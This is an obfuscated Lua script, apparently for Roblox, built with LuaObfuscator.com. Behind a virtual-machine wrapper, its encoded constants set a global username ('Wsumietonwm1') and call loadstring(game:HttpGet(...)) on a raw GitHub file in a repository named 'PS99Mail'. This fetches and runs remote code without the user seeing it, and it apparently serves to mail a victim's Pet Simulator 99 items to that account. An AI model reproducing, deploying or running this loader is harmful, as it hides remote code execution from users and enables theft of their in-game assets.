--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v102=v5(v85,v19);v19=nil;return v102;else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=(v31/((5 -(880 -(282 + 595)))^(v32-(2 -1))))%((3 -1)^(((v33-((1639 -(1523 + 114)) -1)) -(v32-(620 -(555 + 64)))) + 1)) ;return v86-(v86%(932 -(857 + 74))) ;else local v87=568 -(367 + 201) ;local v88;while true do if (v87==(927 -(214 + 713))) then v88=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v88 + v88))>=v88) and 1) or 0 ;end end end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(1 -(117 -(32 + 85)))) then return v35;end if (v34==(1065 -(68 + 978 + 19))) then v35=v1(v16,v18,v18);v18=v18 + ((282 + 989) -(226 + 1044)) ;v34=4 -3 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -3) ;return (v41 * 16777216) + (v40 * (65886 -(87 + 263))) + (v39 * (436 -(50 + 17 + 113))) + v38 ;end local function v24()local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 0)) then v45=3 -2 ;v46=(v20(v44,953 -(802 + 150) ,53 -33 ) * ((3 -1)^(24 + 8))) + v43 ;v42=999 -((2517 -1602) + (321 -239)) ;end if (v42==(8 -5)) then if (v47==(0 + 0 + 0)) then if (v46==(1138 -(116 + 1022))) then return v48 * (0 -(0 + 0)) ;else local v103=0 + 0 ;while true do if (v103==(1187 -(1069 + 118))) then v47=2 -(1056 -(87 + 968)) ;v45=0 -0 ;break;end end end elseif (v47==2047) then return ((v46==(0 + (0 -0))) and (v48 * ((1 -0)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(1814 -(368 + 423)) ) * (v45 + (v46/((6 -4)^(1132 -(1020 + 60))))) ;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=1424 -(630 + 793) ;end if (v42==(20 -(10 + (17 -9)))) then v47=v20(v44,80 -59 ,(1886 -(447 + 966)) -(416 + 26) );v48=((v20(v44,109 -77 )==(1748 -((2080 -1320) + 987))) and  -(1914 -(1789 + 124))) or (767 -(745 + 21)) ;v42=9 -(1823 -(1703 + 114)) ;end end end local function v25(v49)local v50=701 -(376 + 325) ;local v51;local v52;while true do if (v50==(0 -0)) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=2 -1 ;end if (v50==(1 + 2 + 0)) then return v6(v52);end if (v50==(4 -2)) then v52={};for v91=15 -(9 + 5) , #v51 do v52[v91]=v2(v1(v3(v51,v91,v91)));end v50=3;end if (v50==(377 -(85 + 291))) then v51=v3(v16,v18,(v18 + v49) -(1266 -((1423 -(1123 + 57)) + 1022)) );v18=v18 + v49 ;v50=7 -5 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v53==2) then v58=nil;v59=nil;v53=7 -4 ;end if (v53==(1134 -(369 + 761))) then v62=nil;while true do if ((1252 -(721 + 530))==v54) then local v99=1271 -(945 + 326) ;while true do if ((2 -1)==v99) then v54=2 + 0 ;break;end if (v99==(238 -(64 + 174))) then v57=nil;v58=nil;v99=701 -(271 + 429) ;end end end if (v54~=(3 + 0)) then else local v100=1500 -(1408 + 92) ;while true do if ((1086 -(461 + 625))~=v100) then else v61=nil;v62=nil;v100=1;end if (v100~=(217 -(42 + 174))) then else v54=4 + 0 ;break;end end end if (v54~=2) then else v59=nil;v60=nil;v54=3;end if (v54==(1288 -(993 + 295))) then local v101=0 + 0 ;while true do if (1==v101) then v54=1;break;end if (v101~=(0 + 0)) then else v55=1504 -(363 + 1141) ;v56=nil;v101=1;end end end if (v54==4) then while true do if (v55==(1580 -(1183 + 397))) then v56=0 -0 ;v57=nil;v55=1;end if (v55~=(1 + 0)) then else local v104=0;while true do if (v104~=0) then else v58=nil;v59=nil;v104=1 + 0 ;end if (v104~=1) then else v55=2;break;end end end if (v55~=(1174 -(418 + 753))) then else v62=nil;while true do local v106=0 + 0 ;while true do if ((1 + 0)==v106) then if ((1934 -(565 + 1368))~=v56) then else local v155=0 -0 ;local v156;while true do if (v155~=(0 + 0)) then else v156=0 + 0 ;while true do if (v156==(530 -(406 + 123))) then v62={};v56=2 -0 ;break;end if (v156~=(1769 -(1749 + 20))) then else v60={v57,v58,nil,v59};v61=v23();v156=1 -0 ;end end break;end end end if (v56==(5 -3)) then local v157=0 + 0 ;while true do if (v157~=1) then else for v170=1146 -(466 + 679) ,v23() do local v171=0 -0 ;local v172;local v173;while true do if (v171==(477 -(41 + 435))) then while true do if (v172~=(1001 -(938 + 63))) then else v173=v21();if (v20(v173,1,2 -1 )==(1900 -(106 + 1794))) then local v185=0;local v186;local v187;local v188;local v189;while true do if ((0 + 0)==v185) then local v190=0 + 0 ;local v191;while true do if (v190==(0 -0)) then v191=0 + 0 ;while true do if (v191~=(2 -1)) then else v185=1;break;end if ((1613 -(1565 + 48))~=v191) then else v186=114 -(4 + 110) ;v187=nil;v191=585 -(57 + 527) ;end end break;end end end if ((1429 -(41 + 1386))~=v185) then else while true do if (v186==1) then local v193=103 -(17 + 86) ;local v194;local v195;while true do if (v193~=(1 + 0)) then else while true do if ((0 -0)==v194) then v195=1092 -(975 + 117) ;while true do if (v195~=(0 -0)) then else local v205=0 -0 ;while true do if (v205~=1) then else v195=1;break;end if (v205~=0) then else local v206=166 -(122 + 44) ;while true do if (v206==1) then v205=1;break;end if ((0 -0)~=v206) then else v189={v22(),v22(),nil,nil};if (v187==0) then local v207=0 + 0 ;local v208;while true do if (v207==0) then v208=0;while true do if (v208~=0) then else v189[1 + 2 ]=v22();v189[7 -3 ]=v22();break;end end break;end end elseif (v187==(66 -(30 + 35))) then v189[3 + 0 ]=v23();elseif (v187==2) then v189[1260 -(1043 + 214) ]=v23() -((3 -1)^(60 -44)) ;elseif (v187~=(6 -3)) then else local v213=0;local v214;while true do if (v213==(0 + 0)) then v214=1212 -(323 + 889) ;while true do if ((0 -0)==v214) then v189[3]=v23() -((3 -1)^16) ;v189[4]=v22();break;end end break;end end end v206=581 -(361 + 219) ;end end end end end if (v195==(321 -(53 + 267))) then v186=2;break;end end break;end end break;end if (v193~=(1227 -(322 + 905))) then else v194=0 + 0 ;v195=nil;v193=1;end end end if (v186~=(1191 -(449 + 740))) then else local v196=413 -(15 + 398) ;while true do if (v196~=(982 -(18 + 964))) then else if (v20(v188,1,1)~=(3 -2)) then else v189[2 + 0 ]=v62[v189[2]];end if (v20(v188,2 + 0 ,852 -(20 + 830) )~=1) then else v189[3]=v62[v189[3 + 0 ]];end v196=127 -(116 + 10) ;end if (v196~=1) then else v186=3;break;end end end if (v186~=(440 -(382 + 58))) then else local v197=0 -0 ;while true do if (v197==1) then v186=1 + 0 ;break;end if (v197~=0) then else v187=v20(v173,740 -(542 + 196) ,6 -3 );v188=v20(v173,8 -4 ,2 + 4 );v197=1 + 0 ;end end end if (v186==(2 + 1)) then if (v20(v188,5 -2 ,7 -4 )~=(2 -1)) then else v189[4]=v62[v189[1 + 3 ]];end v57[v170]=v189;break;end end break;end if (v185~=(2 -1)) then else local v192=1551 -(1126 + 425) ;while true do if (v192==(1690 -(1121 + 569))) then v188=nil;v189=nil;v192=215 -(22 + 192) ;end if (v192==(684 -(483 + 200))) then v185=1465 -(1404 + 59) ;break;end end end end end break;end end break;end if ((405 -(118 + 287))~=v171) then else local v181=0 -0 ;while true do if (v181~=(766 -(468 + 297))) then else v171=3 -2 ;break;end if (v181==(562 -(334 + 228))) then v172=0;v173=nil;v181=3 -2 ;end end end end end v56=1124 -(118 + 1003) ;break;end if (v157==(0 -0)) then for v174=378 -(142 + 235) ,v61 do local v175=0;local v176;local v177;local v178;while true do if (v175~=1) then else v178=nil;while true do if (v176==(0 + 0)) then v177=v21();v178=nil;v176=1;end if ((237 -(141 + 95))~=v176) then else if (v177==1) then v178=v21()~=0 ;elseif (v177==(9 -7)) then v178=v24();elseif (v177~=3) then else v178=v25();end v62[v174]=v178;break;end end break;end if (v175~=(0 + 0)) then else v176=0 + 0 ;v177=nil;v175=978 -(553 + 424) ;end end end v60[1 + 2 ]=v21();v157=1;end end end break;end if (v106==(0 -0)) then local v119=0 + 0 ;while true do if (v119==0) then if (3~=v56) then else local v168=0;while true do if (v168~=(0 + 0)) then else local v179=0;while true do if (v179~=(0 + 0)) then else for v183=1 + 0 ,v23() do v58[v183-1 ]=v28();end return v60;end end end end end if (v56~=(0 + 0)) then else local v169=0;while true do if ((1 + 0)==v169) then v59={};v56=1 + 0 ;break;end if (v169~=(0 + 0)) then else local v180=0 -0 ;while true do if ((1 -0)==v180) then v169=1;break;end if (v180~=(0 -0)) then else v57={};v58={};v180=2 -1 ;end end end end end v119=1;end if (v119==(1 + 0)) then v106=1 + 0 ;break;end end end end end break;end if (v55==(4 -2)) then local v105=0 -0 ;while true do if (v105~=(753 -(239 + 514))) then else v60=nil;v61=nil;v105=1;end if (1~=v105) then else v55=852 -(254 + 595) ;break;end end end end break;end end break;end if ((0 + 0)~=v53) then else v54=1329 -(797 + 532) ;v55=nil;v53=1 + 0 ;end if (v53==1) then v56=nil;v57=nil;v53=1 + 1 ;end if (v53~=(6 -3)) then else v60=nil;v61=nil;v53=10 -6 ;end end end local function v29(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v69=v66;local v70=v67;local v71=v68;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v90=0;while true do if (0==v90) then v81=v69[v73];v82=v81[1];v90=1;end if (v90==1) then if (v82<=3) then if (v82<=1) then if (v82>0) then v79[v81[2]]();else v79[v81[2]]=v81[3];end elseif (v82>2) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v65;else v79[v81[2]]=v65[v81[3]];end else local v109=0;local v110;local v111;local v112;local v113;local v114;while true do if (v109==1) then v81=v69[v73];v65[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v65;else v79[v81[2]]=v65[v81[3]];end v73=v73 + 1 ;v109=2;end if (2==v109) then v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v65;else v79[v81[2]]=v65[v81[3]];end v73=v73 + 1 ;v81=v69[v73];v114=v81[2];v113=v79[v81[3]];v109=3;end if (v109==3) then v79[v114 + 1 ]=v113;v79[v114]=v113[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v109=4;end if (v109==5) then v73=v73 + 1 ;v81=v69[v73];v114=v81[2];v79[v114]=v79[v114](v13(v79,v114 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v109=6;end if (v109==6) then v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end break;end if (v109==4) then v81=v69[v73];v114=v81[2];v111,v112=v72(v79[v114](v13(v79,v114 + 1 ,v81[3])));v74=(v112 + v114) -1 ;v110=0;for v158=v114,v74 do v110=v110 + 1 ;v79[v158]=v111[v110];end v109=5;end if (v109==0) then v110=nil;v111,v112=nil;v113=nil;v114=nil;v79[v81[2]]=v81[3];v73=v73 + 1 ;v109=1;end end end elseif (v82<=5) then if (v82==4) then v65[v81[3]]=v79[v81[2]];else local v117=v81[2];v79[v117]=v79[v117](v13(v79,v117 + 1 ,v74));end elseif (v82<=6) then do return;end elseif (v82==7) then local v123=v81[2];local v124=v79[v81[3]];v79[v123 + 1 ]=v124;v79[v123]=v124[v81[4]];else local v128=v81[2];local v129,v130=v72(v79[v128](v13(v79,v128 + 1 ,v81[3])));v74=(v130 + v128) -1 ;local v131=0;for v152=v128,v74 do v131=v131 + 1 ;v79[v152]=v129[v131];end end v73=v73 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!063O0003083O00557365726E616D65030C3O005773756D6965746F6E776D31030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000A3O0012023O00023O00124O00013O00124O00033O00122O000100043O00202O00010001000500122O000300066O000100039O0000026O000100016O00017O00",v9(),...);
